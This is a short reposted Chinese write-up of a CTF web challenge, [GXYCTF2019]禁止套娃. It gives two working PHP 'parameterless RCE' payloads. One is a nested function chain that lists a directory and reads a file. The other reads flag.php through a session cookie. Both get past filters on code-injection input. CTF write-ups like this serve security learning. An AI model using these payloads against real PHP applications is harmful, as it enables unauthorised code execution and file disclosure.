码上快乐

相关内容   简体   繁体

刷题记录:[GXYCTF2019]禁止套娃

本文转载自  查看原文  2020-01-15 01:27  1395    web刷题

目录

刷题记录:[GXYCTF2019]禁止套娃

题目复现链接:https://buuoj.cn/challenges

知识点

无参数RCE

echo(readfile(array_rand(array_flip(scandir(chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))))))));
array_rand从数组中随机取出一个键
array_filp交换数组键值

或者show_source(session_id(session_start()));
然后加上cookiePHPSESSID=flag.php


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



猜您在找 [GXYCTF2019]禁止套娃 [BUUOJ记录] [GXYCTF2019]BabyUpload [GXYCTF2019]BabySQli GXYCTF2019 CheckIn [GXYCTF2019]BabySQli [GXYCTF2019]BabySQli [GXYCTF2019]BabyUpload [GXYCTF2019]StrongestMind [GXYCTF2019]BabyUpload [GXYCTF2019]simple CPP
 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM